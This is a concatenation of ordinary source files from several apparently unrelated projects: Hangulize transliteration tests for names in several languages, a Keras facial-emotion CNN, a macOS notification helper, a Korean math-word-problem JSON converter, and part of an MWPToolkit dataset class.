'Ἀμαζών': '아마존',
'Πενθεσίλεια': '펜테실레이아',
'Ἱππολύτη': '히폴리테',
'Πυθία': '피티아',
'Πύθων': '피톤',
'όμφαλος': '옴팔로스',
'Πυθαγόρας': '피타고라스',
'Ἱπποκράτης': '히포크라테스',
'Πάππος': '파포스',
'Πυθαγόρας': '피타고라스',
'Ζήνων': '제논',
'Ἀναξίμανδρος': '아낙시만드로스',
'Θαλῆς': '탈레스',
'Δημόκριτος': '데모크리토스',
'Ἀπολλώνιος': '아폴로니오스',
'Στράβων': '스트라본',
'Εὐκτήμων': '에욱테몬',
'Ἐρατοσθένης': '에라토스테네스',
'Ἵππαρχος': '히파르코스',
'Ἡσίοδος': '헤시오도스',
'Αἴσωπος': '아이소포스',
'Εὐριπίδης': '에우리피데스',
'Ξενοφῶν': '크세노폰',
'Θεμιστοκλῆς': '테미스토클레스',
})
```
#### File: han/tests/lit.py
```python
from tests import HangulizeTestCase
from hangulize.langs.lit import Lithuanian
class LithuanianTestCase(HangulizeTestCase):
lang = Lithuanian()
def test_people(self):
self.assert_examples({
'<NAME>us': '발다스 아담쿠스',
'Virgilijus Alekna': '비르길리유스 알레크나',
'Algirdas': '알기르다스',
'Jurgis Baltrušaitis': '유르기스 발트루샤이티스',
'Gediminas Baravykas': '게디미나스 바라비카스',
'Jonas Basanavičius': '요나스 바사나비추스',
'Bernardas Brazdžionis': '베르나르다스 브라즈조니스',
'Elena Čiudakova': '엘레나 추다코바',
'Čiurlionis': '추를료니스',
'Tomas Danilevičius': '토마스 다닐레비추스',
'Simonas Daukantas': '시모나스 다우칸타스',
'Jurgis Dobkevičius': '유르기스 돕케비추스',
'Gediminas': '게디미나스',
'Vitas Gerulaitis': '비타스 게룰라이티스',
'Marija Gimbutienė': '마리야 김부티에네',
'Dalia Grybauskaitė': '달랴 그리바우스카이테',
'Laurynas Gucevičius': '라우리나스 구체비추스',
'Žydrūnas Ilgauskas': '지드루나스 일가우스카스',
'Jonas Jablonskis': '요나스 야블론스키스',
'Edgaras Jankauskas': '에드가라스 양카우스카스',
'Šarūnas Jasikevičius': '샤루나스 야시케비추스',
'Jogaila': '요가일라',
'Kęstutis': '케스투티스',
'Linas Kleiza': '리나스 클레이자',
'Konstantinas': '콘스탄티나스',
'Jonas Kubilius': '요나스 쿠빌류스',
'Vincas Kudirka': '빈차스 쿠디르카',
'Maironis': '마이로니스',
'Šarūnas Marčiulionis': '샤루나스 마르출료니스',
'Mikalojus': '미칼로유스',
'Mindaugas': '민다우가스',
'Arminas Narbekovas': '아르미나스 나르베코바스',
'Salomėja Nėris': '살로메야 네리스',
'Martynas Mažvydas': '마르티나스 마주비다스',
'Mykolas Kleopas Oginskis': '미콜라스 클레오파스 오긴스키스',
'Robertas Poškus': '로베르타스 포슈쿠스',
'Kazimiera Prunskienė': '카지미에라 프룬스키에네',
'Jonušas Radvila': '요누샤스 라드빌라',
'Violeta Riaubiškytė': '뵬레타 랴우비슈키테',
'Arvydas Sabonis': '아르비다스 사보니스',
'Antanas Smetona': '안타나스 스메토나',
'<NAME>aila': '다류스 송가일라',
'<NAME>kevičius': '마류스 스탕케비추스',
'Vytautas Straižys': '비타우타스 스트라이지스',
'Deividas Šemberas': '데이비다스 솀베라스',
'Ramūnas Šiškauskas': '라무나스 시슈카우스카스',
'Juozas Urbšys': '유오자스 우르프시스',
'Vytautas': '비타우타스',
})
def test_places(self):
self.assert_examples({
'Alytus': '알리투스',
'Biržai': '비르자이',
'Dubingiai': '두빙갸이',
'Įsrutis': '이스루티스',
'Kaunas': '카우나스',
'Kernavė': '케르나베',
'Klaipėda': '클라이페다',
'Marijampolė': '마리얌폴레',
'Mažeikiai': '마제이캬이',
'Panevėžys': '파네베지스',
'Šiauliai': '샤울랴이',
'Trakai': '트라카이',
'Vilnius': '빌뉴스',
})
```
#### File: han/tests/spa.py
```python
from tests import HangulizeTestCase
from hangulize.langs.spa import Spanish
class SpanishTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0204.jsp """
lang = Spanish()
def test_basic(self):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0102.jsp """
self.assert_examples({
'biz': '비스',
'blandon': '블란돈',
'braceo': '브라세오',
'colcren': '콜크렌',
'Cecilia': '세실리아',
'coccion': '콕시온',
'bistec': '비스텍',
'dictado': '딕타도',
'chicharra': '치차라',
'felicidad': '펠리시다드',
'fuga': '푸가',
'fran': '프란',
'ganga': '강가',
'geologia': '헤올로히아',
'yungla': '융글라',
'hipo': '이포',
'quehacer': '케아세르',
'jueves': '후에베스',
'reloj': '렐로',
'kapok': '카포크',
'lacrar': '라크라르',
'Lulio': '룰리오',
'ocal': '오칼',
'llama': '야마',
'lluvia': '유비아',
'membrete': '멤브레테',
'noche': '노체',
'flan': '플란',
'ñoñez': '뇨녜스',
'mañana': '마냐나',
'pepsina': '펩시나',
'plantón': '플란톤',
'quisquilla': '키스키야',
'rascador': '라스카도르',
'sastreria': '사스트레리아',
'tetraetro': '테트라에트로',
'viudedad': '비우데다드',
'xenón': '세논',
'laxante': '락산테',
'yuxta': '육스타',
'zagal': '사갈',
'liquidez': '리키데스',
'walkirias': '왈키리아스',
'yungla': '융글라',
'braceo': '브라세오',
'reloj': '렐로',
'Lulio': '룰리오',
'ocal': '오칼',
'viudedad': '비우데다드',
})
def test_1st(self):
"""제1항: gu, qu
gu, qu는 i, e 앞에서는 각각 'ㄱ, ㅋ'으로 적고, o 앞에서는 '구, 쿠'로
적는다. 다만, a 앞에서는 그 a와 합쳐 '과, 콰'로 적는다.
"""
self.assert_examples({
'guerra': '게라',
'queso': '케소',
'Guipuzcoa': '기푸스코아',
'quisquilla': '키스키야',
'antiguo': '안티구오',
'Quorem': '쿠오렘',
'Nicaragua': '니카라과',
'Quarai': '콰라이',
})
def test_2nd(self):
"""제2항
같은 자음이 겹치는 경우에는 겹치지 않은 경우와 같이 적는다. 다만,
-cc-는 'ㄱㅅ'으로 적는다.
"""
self.assert_examples({
'carrera': '카레라',
'carreterra': '카레테라',
'accion': '악시온',
})
def test_3rd(self):
"""제3항: c, g
c와 g 다음에 모음 e와 i가 올 때에는 c는 'ㅅ'으로, g는 'ㅎ'으로 적고,
그 외는 'ㅋ'과 'ㄱ'으로 적는다.
"""
self.assert_examples({
'Cecilia': '세실리아',
'cifra': '시프라',
'georgico': '헤오르히코',
'giganta': '히간타',
'coquito': '코키토',
'gato': '가토',
})
def test_4th(self):
"""제4항: x
x가 모음 앞에 오되 어두일 때에는 'ㅅ'으로 적고, 어중일 때에는
'ㄱㅅ'으로 적는다.
"""
self.assert_examples({
'xilofono': '실로포노',
'laxante': '락산테',
})
def test_5th(self):
"""제5항: l
어말 또는 자음 앞의 l은 받침 'ㄹ'로 적고, 어중의 1이 모음 앞에 올
때에는 'ㄹㄹ'로 적는다.
"""
self.assert_examples({
'ocal': '오칼',
'colcren': '콜크렌',
'blandon': '블란돈',
'Cecilia': '세실리아',
})
def test_6th(self):
"""제6항: nc, ng
c와 g 앞에 오는 n은 받침 'ㅇ'으로 적는다.
"""
self.assert_examples({
'blanco': '블랑코',
'yungla': '융글라',
})
def test_hangulize(self):
self.assert_examples({
'ñoñez': '뇨녜스',
'güerrero': '궤레로',
'Güicho': '귀초',
'Gamiño': '가미뇨',
'Ángeles': '앙헬레스',
'José Ortega y Gasset': '호세 오르테가 이 가세트',
})
```
#### File: han/tests/tur.py
```python
from tests import HangulizeTestCase
from hangulize.langs.tur import Turkish
class TurkishTestCase(HangulizeTestCase):
lang = Turkish()
def test_people(self):
self.assert_examples({
'<NAME>': '사이트 파이크 아바스야느크',
'Ali Kuşçu': '알리 쿠슈추',
'Hamit Altıntop': '하미트 알튼토프',
'<NAME>k': '무스타파 케말 아타튀르크',
'<NAME>': '가라베트 아미라 발리안',
'Krikor Balyan': '크리코르 발리안',
'Nigoğos Balyan': '니고오스 발리안',
'Battani': '바타니',
'Hüseyin Çağlayan': '휘세인 찰라얀',
'S<NAME>bi': '쉴레이만 첼레비',
'<NAME>ş': '라우프 뎅크타슈',
'Bülent Ecevit': '뷜렌트 에제비트',
'Ahmet Mithat Efendi': '아흐메트 미타트 에펜디',
'Yunus Emre': '유누스 엠레',
'Recep Tayyip Erdoğan': '레제프 타이이프 에르도안',
'Sertab Erener': '세르타브 에레네르',
'Tevfik Fikret': '테브피크 피크레트',
'Ertuğrul Gazi': '에르투룰 가지',
'Ziya Gökalp': '지야 괴칼프',
'Abdullah Gül': '아브둘라흐 귈',
'Şenol Güneş': '셰놀 귀네슈',
'Reşat Nuri Güntekin': '레샤트 누리 귄테킨',
'Ahmed Hâşim': '아흐메드 하심',
'Nâzım Hikmet': '나즘 히크메트',
'Nihat Kahveci': '니하트 카흐베지',
'Yakup Kadri Karaosmanoğlu': '야쿠프 카드리 카라오스마놀루',
'Nâmık Kemal': '나므크 케말',
'Yaşar Kemal': '야샤르 케말',
'Fazıl Küçük': '파즐 퀴취크',
'İlhan Mansız': '일한 만스즈',
'Nakkaş Osman': '나카슈 오스만',
'Orhan Pamuk': '오르한 파무크',
'Ajda Pekkan': '아주다 페칸',
'Osman Hamdi Bey': '오스만 함디 베이',
'Pir Sultan Abdal': '피르 술탄 아브달',
'Rüştü Reçber': '뤼슈튀 레치베르',
'Ziynet Sali': '지네트 살리',
'Ömer Seyfettin': '외메르 세이페틴',
'Kanuni Sultan Süleyman': '카누니 술탄 쉴레이만',
'Tuncay Şanlı': '툰자이 샨르',
'Âşık Veysel Şatıroğlu': '아시으크 베이셀 샤트롤루',
'Mahzuni Şerif': '마흐주니 셰리프',
'Hakan Şükür': '하칸 쉬퀴르',
'Takiyüddin ibn Manıf': '타키위딘 이븐 마느프',
'Tarkan Tevetoğlu': '타르칸 테베톨루',
'Arda Turan': '아르다 투란',
'Halit Ziya Uşaklıgil': '할리트 지야 우샤클르길',
})
def test_places(self):
self.assert_examples({
'Adana': '아다나',
'Ağrı': '아르',
'Ankara': '앙카라',
'Antakya': '안타키아',
'Antalya': '안탈리아',
'Arykanda': '아리칸다',
'Beşiktaş': '베식타슈',
'Bursa': '부르사',
'Çanakkale': '차나칼레',
'Çatalhöyük': '차탈회위크',
'Denizli': '데니즐리',
'Divriği': '디브리이',
'Dolmabahçe': '돌마바흐체',
'Gaziantep': '가지안테프',
'Hattuşaş': '하투샤슈',
'İstanbul': '이스탄불',
'İzmir': '이즈미르',
'Kapadokya': '카파도키아',
'Kayseri': '카이세리',
'Konya': '코니아',
'Mersin': '메르신',
'Pamukkale': '파무칼레',
'Patara': '파타라',
'Safranbolu': '사프란볼루',
'Selçuk': '셀추크',
'Topkapı': '톱카프',
'Trabzon': '트라브존',
'Türkiye': '튀르키예',
})
```
#### File: han/tests/vie.py
```python
from tests import HangulizeTestCase
from hangulize.langs.vie import Vietnamese
class VietnameseTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0218.jsp """
lang = Vietnamese()
def test_1st(self):
"""제1항
nh는 이어지는 모음과 합쳐서 한 음절로 적는다. 어말이나 자음 앞에서는
받침 ‘ㄴ' 으로 적되, 그 앞의 모음이 a인 경우에는 a와 합쳐 ‘아인'으로
적는다.
"""
self.assert_examples({
# u'Nha Trang': u'냐짱',
# u'<NAME>': u'호찌민',
# u'Thanh Hoa': u'타인호아',
# u'Đông Khanh': u'동카인',
})
def test_2nd(self):
"""제2항
qu는 이어지는 모음이 a일 경우에는 합쳐서 ‘꽈'로 적는다.
"""
self.assert_examples({
'Quang': '꽝',
# u'hat quan ho': u'핫꽌호',
'Quôc': '꾸옥',
'Quyên': '꾸옌',
})
def test_3rd(self):
"""제3항
y는 뒤따르는 모음과 합쳐서 한 음절로 적는다.
"""
self.assert_examples({
'yên': '옌',
'Nguyên': '응우옌',
})
def test_4th(self):
"""제4항
어중의 l이 모음 앞에 올 때에는 ‘ㄹㄹ'로 적는다.
다만, 인명의 성과 이름은 별개의 단어로 보아 이 규칙을 적용하지 않는다.
"""
self.assert_examples({
# u'klông put': u'끌롱쁫',
'Pleiku': '쁠래이꾸',
# u'Ha Long': u'할롱',
# u'My Lay': u'밀라이',
})
``` |
{
"source": "jinwkim/emotion-detection",
"score": 3
} |
#### File: emotion-detection/face-emotion/face-emotion-model.py
```python
import keras
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model, load_model
from keras.layers import Input, Dense, Dropout, Flatten, Conv2D, MaxPooling2D
import numpy as np
num_emotions = 7
batch_size = 256
steps_per_epoch = 112
epochs = 11
emotions = ['angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral']
def split_data():
# Import fer2013.csv
with open("fer2013.csv") as file:
data = file.readlines()
lines = np.array(data)
x_train, y_train, x_test, y_test = [], [], [], []
# Split dataset into training and test sets
for i in range(1,lines.size):
emotion, img, usage = lines[i].split(",")
val = img.split(" ")
pixels = np.array(val, 'float32')
emotion = keras.utils.np_utils.to_categorical(emotion, num_emotions)
if 'Training' in usage:
y_train.append(emotion)
x_train.append(pixels)
elif 'PublicTest' in usage:
y_test.append(emotion)
x_test.append(pixels)
# Cast and normalize data
x_train, y_train, x_test, y_test = np.array(x_train), np.array(y_train), np.array(x_test), np.array(y_test)
x_train, x_test = np.true_divide(x_train, 255.0), np.true_divide(x_test, 255.0)
# Make sure data is in the right shape
x_train, x_test = x_train.reshape( (len(x_train),48,48,1) ), x_test.reshape( (len(x_test),48,48,1) )
print("x_train, y_train, x_test, y_test: ",x_train.shape, y_train.shape, x_test.shape, y_test.shape)
return x_train, y_train, x_test, y_test
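# Note: with the standard fer2013.csv this split typically yields about 28,709 Training
# rows and 3,589 PublicTest rows, so the printed shapes come out around
# (28709, 48, 48, 1)/(28709, 7) and (3589, 48, 48, 1)/(3589, 7); that is also roughly
# where steps_per_epoch = 112 (~28709 / 256) comes from.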
def create_model():
inputs = Input(shape=(48, 48, 1, ))
conv = Conv2D(filters=32, kernel_size=(3,3), activation='relu')(inputs)
conv = Conv2D(filters=64, kernel_size=(3,3), activation='relu')(conv)
pool = MaxPooling2D(pool_size=(2,2))(conv)
dropout = Dropout(0.4)(pool)
conv = Conv2D(filters=128, kernel_size=(3,3), activation='relu')(dropout)
pool = MaxPooling2D(pool_size=(2,2))(conv)
conv = Conv2D(filters=128, kernel_size=(3,3), activation='relu')(pool)
pool = MaxPooling2D(pool_size=(2,2))(conv)
dropout = Dropout(0.4)(pool)
flatten = Flatten()(dropout)
dense = Dense(1024, activation='relu')(flatten)
dropout = Dropout(0.5)(dense)
pred = Dense(7, activation='softmax')(dropout)
return Model(inputs=inputs, outputs=pred)
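# Note: the model above is a small functional-API CNN for 48x48x1 inputs -- two stacked
# conv layers (32 and 64 filters) followed by max-pooling and dropout, then two 128-filter
# conv layers each followed by max-pooling plus another dropout, flattened into a
# 1024-unit dense layer and a 7-way softmax matching the seven fer2013 emotion classes
# listed in `emotions`.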
def cnn():
x_train, y_train, x_test, y_test = split_data()
model = create_model()
# Use ImageDataGenerator for better generalizability
datagen = ImageDataGenerator()
# Compile model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
# Train model, save for quick reload later
model.fit(datagen.flow(x_train, y_train, batch_size=batch_size), epochs=epochs, steps_per_epoch=steps_per_epoch,
validation_data=datagen.flow(x_test, y_test, batch_size=batch_size))
model.save('../models/face-emotion.h5')
def test_cnn():
model = load_model('../models/face-emotion.h5')
x_train, y_train, x_test, y_test = split_data()
print("evaluating facial emotion recognition model")
model.evaluate(x_test, y_test)
cnn()
test_cnn()
```
#### File: jinwkim/emotion-detection/notification.py
```python
import os
# https://code-maven.com/display-notification-from-the-mac-command-line
# Add audio feedback?
def displayNotification(message,title=None):
"""
    Display an OSX notification with the given message and an optional title.
sounds are located in /System/Library/Sounds or ~/Library/Sounds
"""
title_part = ''
if title:
title_part = 'with title "{0}"'.format(title)
# icon_button = 'with icon caution buttons {\"OK\"}'
appleScriptNotification = 'display notification "{0}" {1} sound name "Beep"'.format(message,title_part)
os.system("osascript -e '{0}'".format(appleScriptNotification))
# speech = 'say "Please listen to the patient."'
# os.system("osascript -e '{0}'".format(speech))
# displayNotification(message="message", title="Your Patient Needs Your Attention")
``` |
{
"source": "Jinwon-DK/GaitAnalysis",
"score": 3
} |
#### File: GaitAnalysis/Code/utils.py
```python
import datetime
def dt_printer():
return datetime.datetime.now()
def dt_printer_m(modules):
data = list()
data.append(dt_printer())
for module in modules:
data.append(module())
return data
``` |
{
"source": "jinwonkim93/MWPToolkit",
"score": 3
} |
#### File: jinwonkim93/MWPToolkit/convert_problemsheet_to_testset_json.py
```python
import json
import argparse
from mwptoolkit.data.dataset.korean_dataset import transfer_digit_to_str
import pathlib
from pororo import Pororo
import re
DATA_PATH = '/home/agc2021/dataset/problemsheet.json'
EVAL_PATH ='./dataset/eval/'
# +
def ner_quantity(q, tk):
# tk = Pororo(task='ner', lang='ko')
cnt = 0
numbers = []
q_ = ''
for i in tk(q):
if i[1] == 'QUANTITY':
prior_end = 0
for p in re.finditer(r'((-?[0-9]+(?:,[0-9]{3})*(\.[0-9]+| ?/ ?-?[0-9]+)?)|(한|두|세|네|다섯|여섯|일곱|여덟|아홉|열) ?(개|칸|마리|권|번|자리|명|가지|사람)|(첫|둘|셋|넷) ?(번|째))', i[0]):
if p.group(2):
numbers.append(p.group(2))
q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
prior_end = p.end()
elif p.group(4):
numbers.append(p.group(4))
q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
q_ += p.group(5)
prior_end = p.end()
elif p.group(6):
numbers.append(p.group(6))
q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
q_ += p.group(7)
prior_end = p.end()
else:
# quantity라고 하는데 number token으로 masking할 문자열을 찾지 못한 경우.
pass
q_ += i[0][prior_end:]
else:
q_ += i[0]
new_numbers = []
for i in numbers:
if (i == '한') or (i == '첫'):
new_numbers.append('1')
elif (i == '두') or (i == '둘'):
new_numbers.append('2')
elif (i == '세') or (i == '셋'):
new_numbers.append('3')
elif (i == '네') or (i == '넷'):
new_numbers.append('4')
elif (i == '다섯'):
new_numbers.append('5')
elif (i == '여섯'):
new_numbers.append('6')
elif (i == '일곱'):
new_numbers.append('7')
elif (i == '여덟'):
new_numbers.append('8')
elif (i == '아홉'):
new_numbers.append('9')
elif (i == '열'):
new_numbers.append('10')
else:
new_numbers.append(i.replace(',',''))
if not new_numbers:
new_numbers = ['0']
q_ += ' NUM_0'
return re.sub("\s+" , " ", q_), new_numbers
# q = '어떤 소수의 소수점을 오른쪽으로 한자리 옮기면 원래보다 2.7만큼 커집니다. 원래의 소수를 구하시오.'
# q1 = '어떤 소수의 소수점을 오른쪽으로 한 자리 옮기면 원래보다 2.7/234만큼 커집니다. 원래의 소수를 구하시오.'
# q2 = '5개의 수 1.4, 9/10, 1.1, 0.5, 13/10이 있습니다. 이 중에서 0.9보다 큰 수는 모두 몇 개입니까?'
# q3 = '5,000부터 1,050,000까지의 수 중에서 2,000원 배수가 아닌 두 사람들의 합을 구하시오 첫 번째.'
# tk = Pororo(task='ner', lang='ko')
# a,b = ner_quantity(q, tk)
# print(a,b)
# a,b = ner_quantity(q1, tk)
# print(a,b)
# a,b = ner_quantity(q2, tk)
# print(a,b)
# a,b = ner_quantity(q3, tk)
# print(a,b)
# 어떤 소수의 소수점을 오른쪽으로 number0 자리 옮기면 원래보다 number1 만큼 커집니다. 원래의 소수를 구하시오. ['한', '2.7']
# 어떤 소수의 소수점을 오른쪽으로 number0 자리 옮기면 원래보다 number1 만큼 커집니다. 원래의 소수를 구하시오. ['한', '2.7']
# number0 개의 수 number1 , number2 , number3 , number4 , number5 이 있습니다. 이 중에서 number6 보다 큰 수는 모두 몇 개입니까? ['5', '1.4', '9/10', '1.1', '0.5', '13/10', '0.9']
# +
def sheet2json_main(args):
data_path = args.data_path
eval_path = args.eval_path
pathlib.Path(eval_path).mkdir(parents=True, exist_ok=True)
with open(data_path, encoding='utf-8-sig') as f:
data = json.load(f)
total_question_length = len(data)+1
tk = Pororo(task='ner', lang='ko')
problem_list = []
for i in range(1, total_question_length):
q_dict = {}
# mask_question, num_list = transfer_digit_to_str(data[str(i)]['question'])
mask_question, num_list = ner_quantity(data[str(i)]['question'], tk)
q_dict['Question'] = mask_question
q_dict['Numbers'] = " ".join(num_list)
q_dict['Answer'] = 1
q_dict['Equation'] = "- NUM_0 NUM_1"
q_dict['ID']=str(i)
problem_list.append(q_dict)
with open(eval_path+'testset.json', 'w', encoding='utf-8-sig') as f:
json.dump(problem_list, f, indent="\t")
with open(eval_path+'trainset.json', 'w', encoding='utf-8-sig') as f:
json.dump([], f, indent="\t")
with open(eval_path+'validset.json', 'w', encoding='utf-8-sig') as f:
json.dump([], f, indent="\t")
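# Note: a hedged sketch of how sheet2json_main is presumably invoked from the command
# line -- the flag names below are assumptions for illustration; only the attribute names
# args.data_path / args.eval_path (and the DATA_PATH / EVAL_PATH defaults) come from this file:
#
#   if __name__ == '__main__':
#       parser = argparse.ArgumentParser()
#       parser.add_argument('--data_path', default=DATA_PATH)
#       parser.add_argument('--eval_path', default=EVAL_PATH)
#       sheet2json_main(parser.parse_args())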
```
#### File: data/dataset/pretrain_dataset.py
```python
import os
import copy
import warnings
from logging import getLogger
import torch
from transformers import ElectraTokenizer,RobertaTokenizer,BertTokenizer
from mwptoolkit.data.dataset.abstract_dataset import AbstractDataset
from mwptoolkit.utils.enum_type import DatasetName, MaskSymbol, NumMask,TaskType,FixType,Operators,SpecialTokens
from mwptoolkit.utils.preprocess_tools import id_reedit
from mwptoolkit.utils.preprocess_tool.equation_operator import from_infix_to_multi_way_tree
from mwptoolkit.utils.preprocess_tool.equation_operator import from_infix_to_postfix, from_infix_to_prefix, from_postfix_to_infix, from_postfix_to_prefix, from_prefix_to_infix, from_prefix_to_postfix
from mwptoolkit.utils.preprocess_tool.sentence_operator import deprel_tree_to_file, get_group_nums_, span_level_deprel_tree_to_file, get_span_level_deprel_tree_, get_deprel_tree_
from mwptoolkit.utils.preprocess_tool.number_transfer import number_transfer
class PretrainDataset(AbstractDataset):
"""dataset class for pre-train model.
"""
def __init__(self, config):
"""
Args:
config (mwptoolkit.config.configuration.Config)
expected that config includes these parameters below:
task_type (str): [single_equation | multi_equation], the type of task.
embedding (str|None): embedding module name, use pre-train model as embedding module, if None, not to use pre-train model.
rule1 (bool): convert equation according to rule 1.
rule2 (bool): convert equation according to rule 2.
            parse_tree_file_name (str|None): the name of the file to save parse tree information.
            pretrained_model_path (str|None): path of the pretrained model.
model (str): model name.
dataset (str): dataset name.
equation_fix (str): [infix | postfix | prefix], convert equation to specified format.
            dataset_path (str): the path of the dataset folder.
language (str): a property of dataset, the language of dataset.
single (bool): a property of dataset, the equation of dataset is single or not.
linear (bool): a property of dataset, the equation of dataset is linear or not.
source_equation_fix (str): [infix | postfix | prefix], a property of dataset, the source format of equation of dataset.
            rebuild (bool): when loading additional dataset information, this decides whether to build the information anew or load information built before.
validset_divide (bool): whether to split validset. if True, the dataset is split to trainset-validset-testset. if False, the dataset is split to trainset-testset.
mask_symbol (str): [NUM | number], the symbol to mask numbers in equation.
min_word_keep (int): in dataset, words that count greater than the value, will be kept in input vocabulary.
min_generate_keep (int): generate number that count greater than the value, will be kept in output symbols.
symbol_for_tree (bool): build output symbols for tree or not.
share_vocab (bool): encoder and decoder of the model share the same vocabulary, often seen in Seq2Seq models.
k_fold (int|None): if it's an integer, it indicates to run k-fold cross validation. if it's None, it indicates to run trainset-validset-testset split.
read_local_folds (bool): when running k-fold cross validation, if True, then loading split folds from dataset folder. if False, randomly split folds.
shuffle (bool): whether to shuffle trainset before training.
"""
super().__init__(config)
self.task_type=config['task_type']
self.rule1=config['rule1']
self.rule2=config['rule2']
self.embedding=config['embedding']
self.pretrained_model_path=config['pretrained_model_path']
self.parse_tree_path = config['parse_tree_file_name']
if self.parse_tree_path != None:
self.parse_tree_path = self.dataset_path + '/' + self.parse_tree_path + '.json'
if not os.path.isabs(self.parse_tree_path):
self.parse_tree_path = os.path.join(self.root,self.parse_tree_path)
def _preprocess(self):
if self.dataset in [DatasetName.hmwp]:
self.trainset,self.validset,self.testset = id_reedit(self.trainset, self.validset, self.testset)
transfer = number_transfer
self.trainset, generate_list, train_copy_nums,unk_symbol = transfer(self.trainset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
self.validset, _g, valid_copy_nums,_ = transfer(self.validset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
self.testset, _g, test_copy_nums,_ = transfer(self.testset, self.dataset, self.task_type, self.mask_symbol, self.min_generate_keep,";")
target_equation_fix=self.equation_fix if self.equation_fix else FixType.Infix
source_equation_fix=self.source_equation_fix if self.source_equation_fix else FixType.Infix
if self.rule1:
if source_equation_fix != FixType.Infix:
warnings.warn("non-infix-equation datasets may not surport en rule1 process, already ignored it. ")
elif self.linear and self.single:
self.en_rule1_process(k=max([train_copy_nums, valid_copy_nums, test_copy_nums]))
else:
warnings.warn("non-linear or non-single datasets may not surport en rule1 process, already ignored it. ")
#raise Warning("non-linear or non-single datasets may not surport en rule1 process, already ignored it. ")
if self.rule2:
if source_equation_fix != FixType.Infix:
warnings.warn("non-infix-equation datasets may not surport en rule2 process, already ignored it. ")
elif self.linear and self.single:
self.en_rule2_process()
else:
warnings.warn("non-linear or non-single datasets may not surport en rule2 process, already ignored it. ")
#raise Warning("non-linear or non-single datasets may not surport en rule2 process, already ignored it. ")
if source_equation_fix == target_equation_fix:
fix = None
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.Prefix:
fix = from_infix_to_prefix
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.Postfix:
fix = from_infix_to_postfix
elif source_equation_fix == FixType.Prefix and target_equation_fix == FixType.Postfix:
fix = from_prefix_to_postfix
elif source_equation_fix == FixType.Prefix and target_equation_fix == FixType.Infix:
fix = from_prefix_to_infix
elif source_equation_fix == FixType.Postfix and target_equation_fix == FixType.Infix:
fix = from_postfix_to_infix
elif source_equation_fix == FixType.Postfix and target_equation_fix == FixType.Prefix:
fix = from_postfix_to_prefix
elif source_equation_fix == FixType.Infix and target_equation_fix == FixType.MultiWayTree:
fix = from_infix_to_multi_way_tree
else:
raise NotImplementedError("the type of equation fix ({}) is not implemented.".format(self.equation_fix))
self.fix_process(fix)
self.operator_mask_process()
self.generate_list = unk_symbol + generate_list
if self.symbol_for_tree:
self.copy_nums = max([train_copy_nums, valid_copy_nums, test_copy_nums])
else:
self.copy_nums = train_copy_nums
if self.task_type==TaskType.SingleEquation:
self.operator_list = copy.deepcopy(Operators.Single)
elif self.task_type==TaskType.MultiEquation:
self.operator_list = copy.deepcopy(Operators.Multi)
self.operator_nums = len(self.operator_list)
self.unk_symbol = unk_symbol
# graph preprocess
use_gpu = True if self.device == torch.device('cuda') else False
if self.model.lower() in ['graph2treeibm']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset, token_list =\
get_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build deprel tree infomation to {} ...".format(self.parse_tree_path))
deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset, token_list =\
get_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
if self.model.lower() in ['hms']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read span-level deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset, self.max_span_size =\
get_span_level_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build span-level deprel tree infomation to {} ...".format(self.parse_tree_path))
span_level_deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset, self.max_span_size =\
get_span_level_deprel_tree_(self.trainset, self.validset, self.testset, self.parse_tree_path)
if self.model.lower() in ['graph2tree']:
if os.path.exists(self.parse_tree_path) and not self.rebuild:
logger = getLogger()
logger.info("read deprel tree infomation from {} ...".format(self.parse_tree_path))
self.trainset, self.validset, self.testset =\
get_group_nums_(self.trainset, self.validset, self.testset, self.parse_tree_path)
else:
logger = getLogger()
logger.info("build deprel tree infomation to {} ...".format(self.parse_tree_path))
deprel_tree_to_file(self.trainset, self.validset, self.testset, \
self.parse_tree_path, self.language, use_gpu)
self.trainset, self.validset, self.testset =\
get_group_nums_(self.trainset, self.validset, self.testset, self.parse_tree_path)
# if self.model.lower() in ["ept"]:
# logger = getLogger()
# logger.info("build ept information ···")
# self.trainset, self.validset, self.testset = \
# preprocess_ept_dataset_(self.trainset, self.validset, self.testset, self.dataset)
def _build_vocab(self):
if self.embedding=='bert':
tokenizer=BertTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='roberta':
tokenizer=RobertaTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='koelectra':
tokenizer=ElectraTokenizer.from_pretrained(self.pretrained_model_path)
elif self.embedding=='ko-roberta':
tokenizer=BertTokenizer.from_pretrained(self.pretrained_model_path)
else:
raise NotImplementedError
# if self.mask_symbol==MaskSymbol.NUM:
# tokenizer.add_tokens(['NUM'])
# elif self.mask_symbol==MaskSymbol.number:
# tokenizer.add_tokens(NumMask.number[:self.copy_nums])
#tokenizer.special_tokens_map.update({'pad_token':SpecialTokens.PAD_TOKEN})
if self.model.lower() in ['trnn']:
